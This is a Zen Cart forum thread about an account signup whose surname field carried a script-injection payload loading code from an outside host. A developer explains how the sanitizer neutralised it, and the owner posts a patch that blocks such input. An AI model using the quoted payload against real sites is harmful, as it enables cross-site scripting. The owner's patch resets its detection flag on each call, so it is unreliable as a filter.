Hack attempt?

[strelitzia]

I have a site running Zen Cart 1.5.7c with lat9's excellent One Page Checkout module.
A recent account created showed the following surname entry.

Code:

Anderson<ScRipT SRc=//nojs.me></

I checked the form fields and they are written like

Code:

$firstname = zen_db_prepare_input(zen_sanitize_string($_POST['firstname']));
$lastname = zen_db_prepare_input(zen_sanitize_string($_POST['lastname']));

How did this get passed zen carts' data sanitization?

[strelitzia]

No response on this from any of the Zen Cart devs, @DrByte, @lat9, @swguy?

I would have expected this kind of entry to be prevented at form submission.

[lat9]

Yes, that was a hack attempt, but the zen_sanitize_string function has negated the inclusion of that <script> tag, converting it to &lt;script&gt; so that while it looks like a script-tag, its operation has been nullified.

[strelitzia]

Yes, that was a hack attempt, but the zen_sanitize_string function has negated the inclusion of that <script> tag, converting it to <script> so that while it looks like a script-tag, its operation has been nullified.

Is there a way to have it prevent the form from being submitted if such an entry is detected, in the same way that the anti spam feature does?

[strelitzia]

I modified functions_general_shared.php to

Code:

function zen_sanitize_string($string) {
    $_SESSION['hackAttempt'] = false;
    $string = preg_replace('/ +/', ' ', $string);
    if (preg_match("/[<>]/", $string)) {
      $_SESSION['hackAttempt'] = true;
    }
    return preg_replace("/[<>]/", '_', $string);
  }

and modules/create_account.php from

Code:

if ($error == true) {
    // hook notifier class
    $zco_notifier->notify('NOTIFY_FAILURE_DURING_CREATE_ACCOUNT');
  } elseif ($antiSpam != '') {
    $zco_notifier->notify('NOTIFY_SPAM_DETECTED_DURING_CREATE_ACCOUNT');
    $messageStack->add_session('header', (defined('ERROR_CREATE_ACCOUNT_SPAM_DETECTED') ? ERROR_CREATE_ACCOUNT_SPAM_DETECTED : 'Thank you, your account request has been submitted for review.'), 'success');
    zen_redirect(zen_href_link(FILENAME_SHOPPING_CART));
  } else {

to

Code:

if ($error == true) {
    // hook notifier class
    $zco_notifier->notify('NOTIFY_FAILURE_DURING_CREATE_ACCOUNT');
  } elseif ($antiSpam != '') {
    $zco_notifier->notify('NOTIFY_SPAM_DETECTED_DURING_CREATE_ACCOUNT');
    $messageStack->add_session('header', (defined('ERROR_CREATE_ACCOUNT_SPAM_DETECTED') ? ERROR_CREATE_ACCOUNT_SPAM_DETECTED : 'Thank you, your account request has been submitted for review.'), 'success');
    zen_redirect(zen_href_link(FILENAME_SHOPPING_CART));
  } elseif ($_SESSION['hackAttempt'] != '') {
      $zco_notifier->notify('NOTIFY_SPAM_DETECTED_DURING_CREATE_ACCOUNT');
      $messageStack->add_session('header', (defined('ERROR_CREATE_ACCOUNT_SPAM_DETECTED') ? ERROR_CREATE_ACCOUNT_SPAM_DETECTED : 'Thank you, your account request has been submitted for review.'), 'success');
      zen_redirect(zen_href_link(FILENAME_SHOPPING_CART));
  } else {

There may be a more elegant solution, but it does what I want for now